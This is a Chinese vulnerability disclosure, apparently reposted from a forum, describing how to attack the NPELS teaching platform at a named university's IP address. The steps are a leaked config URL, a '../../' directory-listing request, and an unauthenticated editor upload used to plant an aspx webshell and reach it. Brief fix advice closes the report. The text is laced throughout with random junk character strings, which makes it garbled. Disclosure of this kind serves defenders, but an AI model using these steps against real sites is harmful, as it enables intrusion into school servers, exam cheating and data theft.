好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
+ A$ `: J& g% x" C# a: i$ y' |& P
1 c7 j5 u) P" ~% A! d4 }& q详细说明:
8 w9 k3 N; D- M7 {4 K . c' k* d1 R5 t" Z, e/ q
以南开大学的为例: " p4 K1 }* w( ?1 S1 f" s7 w4 }5 E" t
http://222.30.60.3/NPELS
0 S2 S$ [# `! G$ `. p* ]' R( SNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
; {# F. }1 ?/ C& |$ Q* G6 l9 I( `" G<setting name="Update_CommonSvr_CommonService" serializeAs="String"># e4 q9 I2 c/ J, S( h+ Y. R3 x
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
. b. i& |$ I `' Q</setting>
' y$ F) X! H; q及版本号 W. }4 l) b3 o! N6 p
<add key="TVersion" value="1, 0, 0, 2187">
$ l$ [# m+ W0 Z/ Z! X) S' I% a</add>
& N9 v' t( b+ g直接访问
4 M% }2 ^8 J; X: ?" H# Ghttp://222.30.60.3/NPELS/CommonService.asmx
/ V9 k+ V) N9 Y H. F: _5 A使用GetTestClientFileList操作,直接 HTTP GET 列目录:' Y3 q5 S4 }: B3 w" C- b. o+ z
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21870 K h4 ?7 ~9 g( K( z8 ]. ?# a
进一步列目录(返回的网页很大,可以直接 wget 下来)
; c. q! g0 [& E/ P8 U) s$ c7 o5 _. ]http://222.30.60.3/NPELS/CommonS ... List?version=../../
& k, r6 ?+ f% M# V # `# v3 d1 t! A( k3 [) K- i$ c
发现* f) [* H6 K# }6 u+ P" I
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
6 ~% t! k0 Z4 W! w3 R9 d可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头2 A+ m: w! v: J
上传后继续列目录找到木马地址直接访问即可; s3 s- G7 \* m9 ]
. ~, ]4 X" G, `1 l0 O8 t; oOOXX
, c9 d& K: K% I+ O' k/ L" t& ]
. V1 ?, n! E7 o7 g' ^+ Z6 d. z+ H; r% |* ZGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
, c3 H) r: R+ {9 u6 Q, q4 ^漏洞证明:
" ?7 X! @. k L9 U( |) ? : O* }/ A/ a7 I2 v2 p* U
列目录:
$ ^2 M& R2 b: H. Q5 Nhttp://222.30.60.3/NPELS/CommonS ... List?version=../../7 \7 I+ y- E. h6 x e" Z
文件上传:6 C. y( `. M& k: v3 O
http://222.30.60.3/npelsv/editor/editor.htm
* `, Z( u1 r! C+ j$ g7 i' F , ~9 F* ^6 b7 K9 Y) L8 T# _) R
上传木马:6 N% u: s. k* ]- b/ g0 e
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx/ \2 m: e1 i/ c, q6 _5 ~
+ r% A+ J; f9 I" Q; f修复方案:
% g+ \8 P) s: ^% \4 g& t好像考试系统必须使用 CommonService.asmx$ x! F+ S3 i' M% j) V# g
最好配置文件加密或者用别的方式不让它泄露出来) x3 c$ U$ p6 O' a9 y% `7 n( T3 i
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样2 l7 W0 q. ~& ]. _, a) v
|